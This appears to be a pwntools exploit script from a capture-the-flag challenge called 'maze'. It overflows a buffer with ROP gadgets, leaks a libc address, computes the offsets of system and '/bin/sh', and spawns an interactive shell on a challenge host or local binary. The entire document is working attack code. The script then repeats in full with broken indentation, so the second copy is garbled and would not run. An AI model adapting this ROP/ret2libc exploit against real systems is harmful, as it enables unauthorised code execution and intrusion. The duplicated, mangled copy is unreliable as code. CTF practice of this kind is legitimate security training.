sudhackar/maze.py

## maze.py
from pwn import *

offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177

bss = 0x00000000000130b8
local = len(sys.argv) == 1
if  not local:
	r = remote('2cea49c9715873cb8bb75a20fe1e3ea7.challenge.help-gsx-get-his-degree.com',60281)
else :
	r = process(executable='./lyH2QWLTjbm86EClU2dVFtWlaA10ORe4TZFxeTifRtA_maze.x',argv=['lyH2QWLTjbm86EClU2dVFtWlaA10ORe4TZFxeTifRtA_maze.x','lol'])
	raw_input()

for _ in xrange(5):
	r.recvline()
r.recvuntil('?')

payload = 'A'*40
payload += p64(0x11683)# : pop rdi ; ret
payload += p64(0x13060)
payload += p64(0x115e8)
payload += p64(0x11681)# : pop rsi ; pop r15 ; ret
payload += p64(bss)
payload += 'JUNKJUNK'
payload += p64(0x11683)# : pop rdi ; ret
payload += p64(0x10306)
payload += p64(0x11258)
payload += 'A'*40
payload += p64(0x000000000001167d)# : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
payload += p64(bss)

r.sendline(payload)
__libc_start_main_leak = u64(r.recvline()[1:7]+'\x00'*2)
print hex(__libc_start_main_leak)
libc_base = __libc_start_main_leak - offset___libc_start_main
libc_system = libc_base + offset_system
libc_bin_sh = libc_base + offset_str_bin_sh

payload2 = 'A'*24
payload2 += p64(0x11683)# : pop rdi ; ret
payload2 += p64(libc_bin_sh)
payload2 += p64(libc_system)

r.sendline(payload2)
r.interactive()
r.close()
	from pwn import *

	offset___libc_start_main = 0x0000000000020740
	offset_system = 0x0000000000045390
	offset_dup2 = 0x00000000000f6d90
	offset_read = 0x00000000000f6670
	offset_write = 0x00000000000f66d0
	offset_str_bin_sh = 0x18c177

	bss = 0x00000000000130b8
	local = len(sys.argv) == 1
	if not local:
	r = remote('2cea49c9715873cb8bb75a20fe1e3ea7.challenge.help-gsx-get-his-degree.com',60281)
	else :
	r = process(executable='./lyH2QWLTjbm86EClU2dVFtWlaA10ORe4TZFxeTifRtA_maze.x',argv=['lyH2QWLTjbm86EClU2dVFtWlaA10ORe4TZFxeTifRtA_maze.x','lol'])
	raw_input()

	for _ in xrange(5):
	r.recvline()
	r.recvuntil('?')

	payload = 'A'*40
	payload += p64(0x11683)# : pop rdi ; ret
	payload += p64(0x13060)
	payload += p64(0x115e8)
	payload += p64(0x11681)# : pop rsi ; pop r15 ; ret
	payload += p64(bss)
	payload += 'JUNKJUNK'
	payload += p64(0x11683)# : pop rdi ; ret
	payload += p64(0x10306)
	payload += p64(0x11258)
	payload += 'A'*40
	payload += p64(0x000000000001167d)# : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
	payload += p64(bss)

	r.sendline(payload)
	__libc_start_main_leak = u64(r.recvline()[1:7]+'\x00'*2)
	print hex(__libc_start_main_leak)
	libc_base = __libc_start_main_leak - offset___libc_start_main
	libc_system = libc_base + offset_system
	libc_bin_sh = libc_base + offset_str_bin_sh

	payload2 = 'A'*24
	payload2 += p64(0x11683)# : pop rdi ; ret
	payload2 += p64(libc_bin_sh)
	payload2 += p64(libc_system)

	r.sendline(payload2)
	r.interactive()
	r.close()